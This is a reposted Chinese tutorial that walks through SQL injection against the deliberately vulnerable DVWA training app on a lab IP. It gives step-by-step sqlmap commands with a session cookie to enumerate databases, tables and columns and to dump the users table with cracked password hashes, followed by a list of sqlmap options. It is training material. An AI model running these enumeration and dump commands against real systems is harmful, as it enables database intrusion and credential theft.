sql註入(轉載)
1、使用firefox瀏覽器(安裝一個firebug插件)登錄http://192.168.204.132/dvwa/login.php頁面,使用admin/password
2、打開firebug工具的cookie面板,將所有cookie復制下來。得到:
PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2; path=/; domain=192.168.204.132
security=low; path=/dvwa/; domain=192.168.204.132
3、打開dvwa的SQL Injection頁面,在User ID輸入框內輸入1,點擊submit按鈕。從地址欄得到要測試的url:
http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
4、從kali打開終端,數據sqlmap,將會有提示文檔。
5、開始測試該url是否存在sql註入漏洞,在終端輸入:
sqlmap -u
‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘
- -cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘
得到信息結果:
web server operating system: Windows web application technology: PHP 5.3.29, Apache 2.4.18 back-end DBMS: MySQL >= 5.5
6、開始探測MYSQL中用來存放應用數據的數據庫名稱,在終端輸入:
sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ --dbs -v 0
得到信息結果:
available databases [5]: [*] dvwa [*] information_schema [*] mysql [*] performance_schema [*] test
7、得到數據庫是dvwa後,開始獲取數據庫中所存在表,在終端輸入:
sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ -D dvwa --tables
得到信息結果:
Database: dvwa [2 tables] +-----------+ | guestbook | | users | +-----------+
8、得到兩張表,獲取一下users表的字段,在終端輸入:
sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ -D dvwa --tables -T users --columns
得到信息結果:
Table: users [8 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | user | varchar(15) | | avatar | varchar(70) | | failed_login | int(3) | | first_name | varchar(15) | | last_login | timestamp | | last_name | varchar(15) | | password | varchar(32) | | user_id | int(6) | +--------------+-------------+
9、最後可以吧表數據導出來了,在終端輸入:
sqlmap -u ‘http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#‘ --cookie=‘PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low‘ -D dvwa --tables -T users --columns --dump
得到信息結果:
Table: users
[5 entries] +---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+ | user_id | avatar | user | password | last_name | first_name | last_login | failed_login | +---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+ | 1 | http://127.0.0.1/DVWA/hackable/users/admin.jpg | admin | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin | admin | 2017-04-01 00:58:43 | 0 | | 2 | http://127.0.0.1/DVWA/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 2017-04-01 00:58:43 | 0 | | 3 | http://127.0.0.1/DVWA/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 2017-04-01 00:58:43 | 0 | | 4 | http://127.0.0.1/DVWA/hackable/users/pablo.jpg | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) | Picasso | Pablo | 2017-04-01 00:58:43 | 0 | | 5 | http://127.0.0.1/DVWA/hackable/users/smithy.jpg | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith | Bob | 2017-04-01 00:58:43 | 0 | +---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[INFO] table ‘dvwa.users‘ dumped to CSV file ‘/root/.sqlmap/output/192.168.204.132/dump/dvwa/users.csv‘
並且導出CSV數據到本地!還發現一個驚喜數,據庫中的密文密碼也給破譯了!!
給出sqlmap的一些選項:(sqlmap -h會給出英文的幫助文檔)
–cookie : 設置我們的cookie值“將DVWA安全等級從high設置為low”
-u : 指定目標URL
-b : 獲取DBMS banner
–current-db : 獲取當前數據庫
–current-user:獲取當前用戶
–string : 當查詢可用時用來匹配頁面中的字符串
–users : 枚舉DBMS用戶
–password : 枚舉DBMS用戶密碼hash
–dbs: 枚舉DBMS中的數據庫
-D : 要枚舉的DBMS數據庫
–tables : 枚舉DBMS數據庫中的數據表
–columns : 枚舉DBMS數據庫表中的所有列
-T : 要枚舉的DBMS數據表
-C: 要枚舉的DBMS數據表中的列
–dump : 轉儲DBMS數據表項
非常感謝原博主的分享,受益頗多:http://blog.csdn.net/qq_20745827/article/details/68953621
sql註入(轉載)